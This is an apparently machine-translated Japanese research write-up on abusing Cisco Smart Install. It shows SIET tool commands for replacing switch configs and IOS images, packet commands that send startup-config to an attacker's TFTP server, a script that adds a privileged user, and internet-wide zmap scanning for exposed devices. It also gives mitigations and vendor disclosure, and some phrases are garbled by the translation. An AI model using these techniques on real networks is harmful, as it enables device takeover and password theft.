Cisco Smart Install。 技術を研究し、攻撃ベクトルを探す

一日の良い時間！ Digital Securityの夏期インターンシップで提案されている通常の「学生」トピックが本格的なセキュリティ研究に発展することを想像することさえ不可能でした。

テクノロジ自体、ハードウェア要件などについては、もちろん、製造元のWebサイト（ Cisco Smart Install）で読むことをお勧めします 。

簡単に言うと、「Smart Installは、新しいネットワークスイッチの現在のオペレーティングシステムイメージを最初に構成およびダウンロードするプロセスを自動化できるテクノロジです。 つまり、「箱から出して」すぐに取り出される新しい機器をすぐに恒久的な場所に設置でき、管理者の関与なしに初期操作に必要なすべてのデータがネットワーク経由で配信されます。 その過程で、テクノロジは構成が変更されたときにも構成をバックアップします。

したがって、これが何らかの形で機能するために、このテクノロジーはデフォルトで有効になっています。 このテクノロジーが使用されているデバイスの完全なリストは、製造元のWebサイトで見ることができます： Cisco Smart Install Supported devices 。

以下で説明するすべての攻撃が「クライアント」に影響することを理解することが重要です。

もちろん、最初のことは、現在のCisco Smart Installインフラストラクチャモデルを再作成することでした。最初は、「仮想」環境（ たとえばgns3 ）でこれを行うことができるという確信がありましたが、このアイデアからSmart Installをサポートするデバイスイメージの検索に長い間失敗しました拒否しなければなりませんでした。

ここでケースが本当に役立ちました。 偶然に（1つのプロジェクトが未完成のままで）自由に使えるようになったので、テクノロジーを研究するためのテスト環境を再構築するのに適した機器を見つけました。

テスト環境のレイアウトと構成

• 「ディレクター」（1）Cisco 2901（CISCO2901 / K9）15.0（1r）M15
• ディレクター（2）Cisco Catalyst 3750（WS-C3750X-48P）15.2（4）E2
• 「Client1」Cisco Catalyst 2960（WS-C2960-48TT-L）15.0（2）SE10
• Client2 Cisco Catalyst 2960S（WS-C2960S-48TS-L）15.2（2a）E
• 「TFTPサーバー」デスクトップWindows 7 x64、TFTPd64
• コンソールデスクトップWindows 7 x64、com1、PuTTy
• 「ノートブック」ノートブックWindows 7 x64、CentOS 7 x64、WireShark（2.0.5）

Smart Installに関する「Director」構成のフラグメント：

vstack group custom c2960Lan product-id image tftp://192.168.1.5/c2960-lanbasek9-tar.150-2.SE10.tar config tftp://192.168.1.5/c2960-lanbase_config.txt match WS-C2960-48TT-L <- Group based on Product ID vstack group custom c2960SLan product-id image tftp://192.168.1.5/c2960s-universalk9-tar.152-2a.E1.tar config tftp://192.168.1.5/c2960SLan_confg match WS-C2960S-48TS-L <- Group based on Product ID ! vstack dhcp-localserver LANPOOL address-pool 192.168.1.0 255.255.255.0 file-server 192.168.1.5 default-router 192.168.1.1 ! vstack director 192.168.1.1 vstack basic vstack startup-vlan 1 vstack backup file-server tftp://192.168.1.5/ 

上記の構成からわかるように、製品IDによるデバイスグループ化を使用しました。
「クライアント」をダウンロードして「ディレクター」に登録すると、次の図が表示されます。

 Director# show vstack status SmartInstall: ENABLED Device Status: ACT - Active INA - Inactive PND - Pending Update HLD - On-hold DNY - Denied NSI - Non Smart Install Image Upgrade: i - in progress I - done X - failed Config Upgrade: c - in progress C - done x - failed Director Database: DevNo MAC Address Product-ID IP_addr Hostname Status ===== ============== ================= =============== ========== ========= 0 fc99.4737.8660 CISCO2901/K9 192.168.1.1 Director.y Director 1 a8b1.d464.2480 WS-C2960S-48TS-L 192.168.1.4 SW_EXT ACT IC <-“Clienr2" 2 d0c2.8279.1880 WS-C2960-48TT-L 192.168.1.2 LAN ACT IC <-“Client1" 

最初の試み

何らかの理由で、まったく新しいトピックを勉強する前に、ルイス・キャロルの「不思議の国のアリス」の不滅の作品からの行が、王が詩を読むようにウサギに頼むと私の記憶に現れます。

どこから始めますか、Your下？ 白うさぎに尋ねた。

最初から始めて、「王様は厳beginningに言いました」、そして最後に達するまで続けます。 じゃあやめて！ （Boris Zakhoderによる翻訳）

私は「最初から」始めようとします。 システムを横から見るだけです。

ラップトップを「Directors」ネットワークに接続し、DHCP経由でネットワークパラメータを取得します。 Wiresharkを起動し、ネットワークカードに届くネットワークパケットを観察します。

もちろん、私は何も面白いものを見ませんでした。 ここで、ケースが再び介入しました。ネットワークワイヤが「クライアント2」に渡される方法が好きではありませんでした。 切断した後、「定性的に」コードを敷き、スイッチをオンにしました。

「クライアント2」が「Director」からネットワークパラメータを受信すると、ブロードキャストパケットを観察します。ネットワーク設定に加えて、特に「Director」ネットワークの特定のパラメータ、特にバックアップ構成ファイルの場所を含むDHCP要求への応答です。



わずか数分で、発見された「脆弱性」を悪用するアルゴリズムが形成されました。

• 「Smart Install」ポート（tcp 4786）の可用性についてネットワークをスキャンします。
• ブロードキャストパケット-見つかったデバイスのネットワークパラメータのリクエストを作成して送信します（DHCPリクエストでこのデバイスのMACアドレスを置き換えます）。
  
  
  
  
• 見つかったデバイスのバックアップ構成の場所に関する情報を含む「Director」からのブロードキャスト応答を受け入れます
• TFTPサーバーからローカルディスクに構成ファイルを「ダウンロード」します。

「正常に機能する」スマートインストールでネットワークに接続できる場合、「クライアント」構成のすべてのバックアップコピーを収集し、ネットワークトポロジを見つけ、運が良ければ、ネットワーク機器管理者のパスワードを取得することは難しくありません。

デバイス構成ファイルの置き換え

次に、コマンドを入力して構成とソフトウェアの更新を強制するときに、「Director」から「Client」に送信されたネットワークパケットを収集することにしました。

ポート上のすべてのネットワークトラフィックを「リッスン」するために、シスコにはセッションの監視という優れたツールがあります。

「Director」で、「Client 1」が接続されているポートからノートブックが接続されているポートへのネットワークトラフィックの「ミラーリング」を構成します。

モニターセッション1ソースインターフェイスFastEthernet0 / 1
モニターセッション1宛先インターフェイスFastEthernet0 / 2

Wiresharkを起動し、ネットワークカードに届くネットワークパケットを観察します。
「Director」で、「Client 1」の構成を強制的に更新するコマンドを順番に実行します。

• #vstack download-config tftp：//192.168.1.5/c2960Lan_confg 192.168.1.2 NONE startup- デバイスを再起動せずに;
• #vstack download-config tftp：//192.168.1.5/c2960Lan_confg 192.168.1.2 NONE startup reload- すぐにデバイスを再起動します。
• #vstack download-config tftp：//192.168.1.5/c2960Lan_confg 192.168.1.2 NONEスタートアップリロード（23:28） -デバイスの再起動の遅延（23時間28分）。

vstack download-configコマンドの構文と設定したコマンドを比較すると、「クライアントスイッチのパスワード」パラメーターが「NONE」であることがわかります。 原則として、次の理由により、任意の文字シーケンスを使用できます。「パスワードは、Smart Install対応ではないスイッチにのみ必要です。 すでにSmart Installネットワークにあるスイッチには必要ありません」-シスコのWebサイトの説明から。

関連するネットワークパケット：







ソケットパッケージでPython 2.7を使用することで大きな成功を期待することなく、ラップトップから「クライアント1」に同じネットワークパケットを形成して送信しようとしました（ラップトップを「Director」の「通常の」ポートにミラ​​ーリングなしで接続しました）。

「クライアント1」は、「ディレクター」からコマンドを受信したときと同じ方法でコマンドを処理しました！

任意の構成ファイルを「クライアント」にアップロードして、それを完全に制御できることがわかりました。 確かに、現在の構成は失われるため、現時点では「サービス拒否」にすぎません。

研究の過程で、すべての攻撃を実行するツールを作成する必要があることが明らかになりました。 Pythonが言語として選択されました。 結果はgithubに投稿されます。

デバイスの設定を置き換えるには、設定ファイルが必要ですが、設定ファイルがない場合は試してみたい場合、ユーティリティはデフォルト設定を作成し、telnet経由でさらにアクセスできるようにします。

 sudo python siet.py - -i 192.168.1.4 

IOSイメージの置換

ディレクターとクライアント間で交換されるネットワークパケットの監視を継続します。 アイデアが浮上しました：デバイス構成ファイルを置き換えることができたら、なぜiOS全体に気付かないのですか。 このプロトコルは、関連する機能を提供します。

• ＃vstack download-image tar tftp：//192.168.1.5/c2960-lanbasek9-tar.150-2.SE10.tar 192.168.1.2 NONE override reload- すぐにデバイスを再起動します。
• ＃vstack download-image tar tftp：//192.168.1.5/c2960-lanbasek9-tar.150-2.SE10.tar 192.168.1.2 NONEは23:15にリロードをオーバーライドします -デバイスの再起動が遅延します（23時間15分）。 -デバイスの再起動の遅延（23時間15分）。

関連するネットワークパケット：





「攻撃」ラップトップからこれらのパケットを送信する実験は、前のものと同様に終了しました。IOSを更新するコマンドが「ディレクター」から来た場合、「クライアント1」は同じように動作しました。

そして、Smart Installを使用するかどうか、ネットワークに「Director」と「Client」が存在するかどうかは関係ないということがわかりました。 プロトコルコマンドはとにかく処理されます。

理論的には、必要なすべての「ブックマーク」で満たされたIOSイメージを準備し、ネットワークスイッチに「アップロード」することが可能です。

このようにして、新しいCisco 2960スイッチの構成とIOSを「箱から出して」更新することに成功しました。

Smart Installの「クライアント」の要件を満たすすべてのデバイスは、「Director」がなくても構成およびソフトウェアを更新するコマンドの影響を受けやすいことがわかりました。

次のコマンドを使用して、イメージの更新を試みることができます。

 sudo python siet.py –u –i 192.168.1.3 

アップグレードプロセス中に、iOSイメージファイルが要求されます。 iOSファームウェアにコードを埋め込む方法については、 こちらをご覧ください 。

デバイスから構成ファイルを盗む

前述の作業が完了した時点で、インターンシッププログラムは一般的に完了したように思えました。 研究の主題が研究されます。 脆弱性が見つかり、ネットワークスイッチへの不正アクセスに使用されました。

しかし、インターンシップマネージャーのGrrrnDog （特別な「ありがとう」）は、デバイスから構成を直接「取得」する機会を見つけるために、プロトコルの研究を続ける必要があると確信しました。

構成を記録するとき（「クライアント」コンソールでメモリコマンドを書き込む ）または「ディレクター」がリブートするときのデバイスのバックアップコピーの自動作成に専念する「スマートインストール」技術に興味がありました。

クライアント2コンソールで、構成を不揮発性メモリ（書き込みメモリ）に書き込むコマンドを指定します。

構成のバックアップコピーを作成するための「Director」からのネットワークパッケージには、3つの「copy」コマンドが含まれていました。

 opy tftp://192.168.1.5//SW_EXT-a8b1.d464.2480.REV2 to flash:SW_EXT-a8b1.d464.2480.tmp 

 opy nvram:startup-config to tftp://192.168.1.5//SW_EXT-a8b1.d464.2480.REV2 

 opy flash:SW_EXT-a8b1.d464.2480.tmp to tftp://192.168.1.5//SW_EXT-a8b1.d464.2480.REV1 

以前の構成バックアップも保存されていることがわかります。

ネットワークパケットにコマンドのわずかに異なるシーケンスを挿入する誘惑を避けることはできませんでした。たとえば、次のとおりです。

 configure terminal username cisco privilege 15 secret 0 cisco exit 

しかし、残念ながら、「コピー」コマンドを除いて、「クライアント」は何も認識しません。 「明確に機能する」ネットワークパケットをコンパイルする過程で、IOSバージョンが15.0以上のCisco Catalystクライアントでは、copy to flashコマンドが最初のコマンドでなければならないことが判明しました。

その結果、「クライアント」上のTFTPサーバーへの構成の転送を開始するパケットは、2つのコマンドで構成されます。

 copy nvram:startup-config flash:/config.text copy nvram:startup-config tftp://192.168.1.5/client.conf 

したがって、問題は小さいままで、このようなパッケージをユーティリティに送信する機能を追加しました。これは正常に行われました。 チーム：

 sudo python siet.py -g -i 192.168.0.4 

構成ファイルをデバイスにコピーし、必要に応じて編集（たとえば、管理者に自分を追加）して、リモートデバイスに適用することができます。

ある程度の操作経験の後、可能な限り多くの特権ユーザーパスワードを収集するために、多数のデバイスから構成ファイルを大量コピーすることが役立つ場合があることがわかりました。 残念ながら、ユーティリティの最初のバージョンはこれをゆっくりと行い、シングルスレッドtftpサーバーは大量のファイルの流入に対処できませんでした。

ユーティリティにマルチスレッドが追加されましたが、これまでのところ完全にはテストされていません。

 sudo python SIET2/siet2.1.py –l list.txt –g 

ここで、list.txtは、ポート4786が開いているIPアドレスのリストを含むファイルです。それから、grepに任せます。

あなたはたくさんいますか？

サービス拒否を引き起こすだけでなく、デバイスの構成を盗み、理論的にはそれを介してフルアクセスを取得する可能性を発見した後、「野生」で見つけられるデバイスの数を見つけるためにインターネットをスキャンすることにしました。

tcp 4786ポートでの単純なスキャンは完全に客観的ではないため（「ディレクター」にもこのポートがあります）、そのようなデバイスを識別する方法が必要でした。

この目的のために、サービスのバージョンを決定するnmap“ samples”（https://svn.nmap.org/nmap/nmap-service-probes）は完全に適切です。

 match cisco-smartinstall m|^\0\0\0\x04\0\0\0\0\0\0\0\x04\0\0\0\x04\0\0\0\x01| p/Cisco Switch Smart Install/ d/switch/ o/IOS/ cpe:/o:cisco:ios/a 

その後、それは小さく、インターネットスキャンを整理し、検出されたデバイスにサンプルを送信し、応答を記録します。 これは、zgrabと組み合わせるとzmapが便利になる場所です。

 zmap -r 10000 -p 4786 -o - | ./zgrab -timeout=10 -port=4786 -data probe.txt -output-file=banners.json 

その結果、251801台のデバイスが見つかりました。 ただし、残念ながら、このnmapテストがすべてのデバイスに適しているという確実性はないため、この結果は正確とは言えません。 ポート4786が開いている約900万のデバイスが見つかりましたが、それらのほとんどはルーターであり、これらの攻撃の影響を受けません。

デバイスでコマンドを実行する

私たちが発見した機会に気付いた後、情報セキュリティに関する会議であるZeroNight 2016で行われた作業について話すことにしました。
会議のレポートを準備する過程で、「Smart Install」テクノロジーの説明が記載されたシスコのWebサイトのページに再度アクセスし、開発者が新しい機能を追加したことを発見しました-「Smart Install」ネットワーク上の新しいデバイスの正常な初期化後に完了する必要があるコンソールコマンドを指定する機能 これらのコマンドは、いわゆるファイル形式で発行されます 「インストール後スクリプト」。

このようなファイルの例（ Cisco Webサイトで提供）：

 "sdm prefer degault" "vlan 12" "name TEST" "exit" 

明らかに、ファイルの各行は、スイッチで端末構成モードに入った後に入力された一連のコマンドです（端末の構成）。 このアイデアは、2行目の終わりに「出口」が存在することによって促されます。

この新しい機能を研究するには、Cisco Catalyst 3750（WS-C3750X-48P）、IOS 15.2（4）E2を「ディレクター」として採用する必要がありました。 設定は古い「Director」からコピーされ、「c2960SLan」グループの設定セクションに次の行が追加されました。

 script tftp://192.168.1.5/c2960-lanbase_post_install.txt 

ファイルを作成します-「インストール後スクリプト」：

 c2960-lanbase_post_install.txt: "interface GigabitEthernet1/0/1" "desc TEST" "exit" "username ccc privilege 15 secret 0 cisco" "exit“ 

「クライアント2」の設定を「消去」し（消去コマンドを書き込み）、再起動します。 IOSを更新し、一般的な構成をダウンロードする既知のプロセスとともに、c2960-lanbase_post_install.txtファイルの内容が読み取られ、そこに書き込まれたコマンドが実行されます。

「Director」から「Client 2」が受信したネットワークパケットは次のようになります。



ファイルからコマンドをダウンロードして実行するには、「クライアント」がネットワークパケットでこのファイルの場所に関する情報のみを送信するだけで十分であることがわかりました（残りは「ゼロ」で埋められます）。

「トリック」は、cccユーザーとしてデバイスにログインに失敗すると非常に印象的に見えますが、ネットワークパケットを「クライアント」に送信した後、承認が突然「パス」します。

見つかった制限：

• 「クライアント」のiOSバージョンは15.2以上のみです（15.0で-動作しなくなります）。
• スイッチは、次の再起動までそのようなパケットを1つだけ受け入れることができます。
• 構成の保存コマンド（ "do-exec wr"）をスクリプトに含めることはできません-緊急再起動。

保護の方法

私の意見では、この問題を解決する最も簡単な方法は、必要に応じてプロトコル機能を含む「鉄トグルスイッチ」を追加することです。 したがって、「ゼロタッチインストール」の概念に違反することはありません。 プロトコルの機能を使用しないユーザーは、デバイスを侵害しません。

すでにリリースされているデバイスでは、Smart Installを使用しない場合は無効にする必要があります。 これを行うには、デバイスのコンソールでno vstackコマンドを使用します。 その後、show vstack configコマンドの出力は次のようになります。

 switch#show vstack config Role: Client (SmartInstall disabled) Vstack Director IP address: 0.0.0.0 

それでも、Cisco Smart Installテクノロジーを適切に使用することにより、多数のデバイスで構成されるネットワーク機器を効果的に管理できます。 この効率は、さまざまな建物や地域に分散したネットワークを管理する場合に特に顕著です。

標準の機器構成にアクセスリスト設定を含めることで、上記の攻撃から身を守ることはほぼ100％安全です。これにより、「Director」のIPアドレスが明確に示され、Smart Installポートでネットワークパケットを受信できます（tcp 4786 ）

この記事で説明するテスト環境の「クライアント」構成の例を示します。

 interface Vlan1 ip address dhcp ip access-group 101 in ! access-list 101 permit tcp host 192.168.1.1 192.168.1.0 0.0.0.255 eq 4786 access-list 101 permit tcp any any neq 4786 access-list 101 permit udp any any access-list 101 deny ip any any ! 

ベンダーの反応

見つかった問題についてシスコに報告した後。 次のような応答がありました。

ただし、徹底的な分析と内部の議論の結果、これは脆弱性ではないと判断しました。
Cisco IOS、IOS XE、またはSmart Install機能自体で使用されますが、設計による認証を必要としないSmart Installプロトコルの正当な機能の誤用です。

同社は、潜在的な危険をユーザーに警告するセクションを追加することにより、ウェブサイトのプロトコル情報を更新しました。

そして、3か月後、彼らはこの研究に感謝の意を表明し、再び公に問題を報告しました 。

あとがきと感謝

この出版物は、 妨害行為とのコラボレーションの結果です。 見つかった脆弱性の悪用に関するすべての資料を書いたのは彼でした。

繰り返しますが、インターンシップのGrrrnDogのヘッドに特別な感謝を表明したいと思います。